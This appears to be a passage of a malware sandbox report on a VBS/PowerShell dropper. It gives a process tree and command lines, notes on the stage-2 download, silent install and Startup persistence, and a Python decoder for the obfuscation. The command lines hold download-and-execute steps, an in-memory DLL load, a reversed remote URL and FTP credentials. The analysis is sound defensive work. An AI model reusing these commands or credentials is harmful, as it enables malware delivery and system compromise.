'C:\Users\Admin\AppData\Local\Temp\demeOnay.vbs';$JzTiG = 'ClassLibrary3.';$gsXfE = 'Class1';$niqGm = 'prFVI';[System.AppDomain]::CurrentDomain.Load( $Fyfdz ).GetType( $JzTiG + $gsXfE ).GetMethod( $niqGm ).Invoke( $null , [object[]] ( 'txt.z/moc.nosrednehmijtcele//:sptth' , $XhRTo , 'D DD' ) );};"3⤵
    Stage 2: branches on $host.Version.Major. On PowerShell 2 (this Windows 7 run) it downloads Upwin.msu from Google Drive (file id 1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42 on a 64-bit host, 1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt otherwise), hands it to wusa.exe /quiet /norestart through another powershell.exe, copies the VBS into the user's Startup folder, sleeps 180 s in a further child and is written to call shutdown.exe /r /t 0 /f afterwards (no shutdown.exe appears in the tree; the run lasted 118 s). Note the assignment is written as tkplB = (...) without the $ sigil, so the .msu path never reaches wusa.exe: the child below runs with the literal argument tkplB. On newer PowerShell it disables certificate validation, forces TLS 1.2, fetches DLL01.txt over FTP with credentials assembled from [char[]] arrays, follows the URL contained in that file, Base64-decodes the payload (after replacing '↓:↓' with 'A') and loads it in-process with [System.AppDomain]::CurrentDomain.Load, invoking ClassLibrary3.Class1.prFVI with the script path and a reversed URL as arguments.
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Drops startup file
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 2836
Depth 4 (child of 2836): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe tkplB /quiet /norestart
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 2280

Depth 5 (child of 2280): C:\Windows\system32\wusa.exe
    "C:\Windows\system32\wusa.exe" tkplB /quiet /norestart
    - Drops file in Windows directory
    PID: 2252

Depth 4 (child of 2836): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 2028
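The stage-1 loader (PID 2652) hides stage 2 as a Base64 string of the UTF-16LE, character-reversed script, with every 'B' spliced in as [char]66, and stage 2 (PID 2836) in turn builds its FTP credentials with -join [char[]](...) and stores the final URL backwards. The Python below is an added example, not code from the sample or from the sandbox, that replays the stage-1 transform and pulls those literals back out. The stage-1 prefix 'Ow' + [char]66 + '9ADsA', the two [char[]] arrays and the reversed URL are copied from the command lines above; STAGE2_FRAGMENT is a constructed concatenation of those fragments (with the %XRqhI% marker left in so the path substitution is exercised), and the regular expressions are my own, tuned to this sample's syntax.

```python
"""Replay the demeOnay.vbs stage-1 PowerShell decoder and pull IOCs out of stage 2.

Added example, not code from the sample or the sandbox. Inputs below are either
copied from the report's command lines or constructed and labelled as such.
"""
import base64
import re

PLACEHOLDER = "уЦϚ"      # $qKKzc.replace('уЦϚ','B') in the stage-1 command line
PATH_MARKER = "%XRqhI%"  # replaced with the script's own path in stage 1

# The ' + [char]66 + ' seams the loader uses to keep the byte 'B' out of its literal.
_CHAR_CONCAT = re.compile(r"'\s*\+\s*\[char\](\d+)\s*\+\s*'")
# (-join [char[]](100,101,...)) expressions used for the FTP credentials in stage 2.
_CHAR_ARRAY = re.compile(r"\[char\[\]\]\(\s*([0-9 ,]+?)\s*\)")
# Single-quoted literals that end in a reversed 'http://' or 'https://'.
_REVERSED_URL = re.compile(r"'([^']*//:s?ptth)'")


def collapse_char_concat(ps_literal: str) -> str:
    """Turn 'Ow' + [char]66 + '9ADsA' (as pasted from the report) into OwB9ADsA."""
    joined = _CHAR_CONCAT.sub(lambda m: chr(int(m.group(1))), ps_literal.strip())
    return joined.strip("'")


def decode_stage1(blob: str, script_path: str = "", placeholder: str = PLACEHOLDER) -> str:
    """Replay the loader: restore 'B', Base64 -> UTF-16LE, reverse, fill in the path.

    b64decode ignores whitespace, so a blob pasted across several lines is fine.
    """
    b64 = blob.replace(placeholder, "B")
    text = base64.b64decode(b64).decode("utf-16-le")
    text = text[::-1]                      # $zmmdr[-1..-$zmmdr.Length] -join ''
    if script_path:
        text = text.replace(PATH_MARKER, script_path)
    return text


def encode_stage1(script: str, placeholder: str = PLACEHOLDER) -> str:
    """Inverse of decode_stage1; used here only to build a constructed test blob."""
    b64 = base64.b64encode(script[::-1].encode("utf-16-le")).decode("ascii")
    return b64.replace("B", placeholder)


def decode_char_arrays(script: str) -> list[str]:
    """Resolve every -join [char[]](...) expression to its plaintext, in order."""
    out = []
    for m in _CHAR_ARRAY.finditer(script):
        codes = [int(c) for c in m.group(1).split(",") if c.strip()]
        out.append("".join(chr(c) for c in codes))
    return out


def find_reversed_urls(script: str) -> list[str]:
    """Un-reverse URL literals stored backwards (the 'txt.z/...' argument in stage 2)."""
    return [m.group(1)[::-1] for m in _REVERSED_URL.finditer(script)]


# Constructed stage-2 fragment: three IOC-bearing expressions copied from the report's
# stage-2 command line and glued together so the helpers have something to run on.
STAGE2_FRAGMENT = (
    "$credential = (New-Object PSCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)), "
    "(ConvertTo-SecureString -AsPlainText -Force -String "
    "(-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )))));"
    "Copy-Item '%XRqhI%' -Destination $startup -force;"
    ".Invoke( $null , [object[]] ( 'txt.z/moc.nosrednehmijtcele//:sptth' , $XhRTo , 'D DD' ) );"
)


def triage(blob: str, script_path: str) -> dict:
    """Decode a stage-1 blob and return the IOCs recoverable from the stage-2 text."""
    stage2 = decode_stage1(blob, script_path=script_path)
    return {
        "stage2": stage2,
        "char_arrays": decode_char_arrays(stage2),
        "reversed_urls": find_reversed_urls(stage2),
    }


if __name__ == "__main__":
    # Real prefix from the report: decodes to ";};", the tail of stage 2 read backwards.
    print(decode_stage1(collapse_char_concat("'Ow' + [char]66 + '9ADsA'")))
    demo = triage(encode_stage1(STAGE2_FRAGMENT),
                  r"C:\Users\Admin\AppData\Local\Temp\demeOnay.vbs")
    for key, value in demo.items():
        print(key, "=>", value)
```

To decode the real blob, paste the whole `$qKKzc = ... ;` value (minus the surrounding `$qKKzc = ` and `;`) into `collapse_char_concat` and feed the result to `decode_stage1` with the script path; the output should start with `; $QDrfV = $host.Version.Major.Equals(2)` as in PID 2836's command line. Reversing after the UTF-16 decode rather than before matters: the loader reverses characters, not bytes.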
Network
MITRE ATT&CK Enterprise v15
Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 8cbbdf801d2c974332545feb05ed7284
  SHA1: d287e6fb7966714cac8ffc57f0999abbf0fffc6a
  SHA256: b9be292b8067c62537333b2be976328f722ce1208a407434d34e528585c9389c
  SHA512: 624e74c416f77c8c7fd26dd279e76d497f8c5ae997f2276726a81969ca1e3efa2c856847b3ebd35a4fbe105bc8be1ffedd5be1e0b1808be508ed303e01feff8f